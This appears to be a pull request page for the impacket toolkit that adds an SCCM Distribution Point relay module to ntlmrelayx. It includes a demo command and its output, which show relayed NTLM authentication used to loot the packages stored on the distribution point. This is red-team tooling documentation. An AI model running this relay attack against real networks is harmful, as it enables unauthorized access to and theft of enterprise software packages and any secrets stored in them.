impacket
impacket copied to clipboard
Published
20 hours ago •
fortra
fortra
feat: ✨ Adding SCCM Distribution Point (HTTP) to NTLMRelayx
This PR adds an SCCM attack primitive presented at the Red Team Village in DEFCON32.
TL;DR - You can authenticate to the HTTP service of a Config Manager (SCCM) Distribution point, and extract all of the packages there.
This PR adds:
- New
--sccmmodule - You're able to NTLM relay to the HTTP service of the distrubition point if authentication is enabled. If authentication is not enabled (Anonymous Authentication enabled), check out sccm-http-looter - modified
ntlmrelayx.pyin the examples scripts - Few other edits
I tried following existing ADCS (ESC8 related) codebase that are in the master branch
Happy to make it more robust if needed. :)
Demo
└─# python3 examples/ntlmrelayx.py -t http://10.2.10.12/SMS_DP_SMSPKG$/Datalib --sccm --sccm-dp-dump -smb2support
Impacket v0.12.0.dev1+20240801.104651.6d8dd858 - Copyright 2023 Fortra
[*] Protocol Client SMB loaded..
[*] Protocol Client SMTP loaded..
[*] Protocol Client HTTP loaded..
[*] Protocol Client HTTPS loaded..
[*] Protocol Client RPC loaded..
[*] Protocol Client LDAPS loaded..
[*] Protocol Client LDAP loaded..
[*] Protocol Client IMAP loaded..
[*] Protocol Client IMAPS loaded..
[*] Protocol Client MSSQL loaded..
[*] Protocol Client DCSYNC loaded..
[*] Running in relay mode to single host
[*] Setting up SMB Server
[*] Setting up HTTP Server on port 80
[*] Setting up WCF Server
[*] Setting up RAW Server on port 6666
[*] Servers started, waiting for connections
[*] SMBD-Thread-5 (process_request_thread): Received connection from 10.2.10.13, attacking target http://10.2.10.12
[*] HTTP server returned error code 200, treating as a successful login
[*] Authenticating against http://10.2.10.12 as LUDUS/SCCM-SQL$ SUCCEED
[*] Dumping SCCM Distribution Point Files
[*] Getting Datalib listing...
[*] Getting Datalib listing from http://10.2.10.12/SMS_DP_SMSPKG$/Datalib...
[*] Data saved to 10.2.10.12_sccm_dump/Datalib.txt
[*] Extracting file names from Datalib listing...
[*] Getting file signatures...
[*] All targets processed!
[*] SMBD-Thread-7 (process_request_thread): Connection from 10.2.10.13 controlled, but there are no more targets left!
[*] SCCM DP Looting complete!
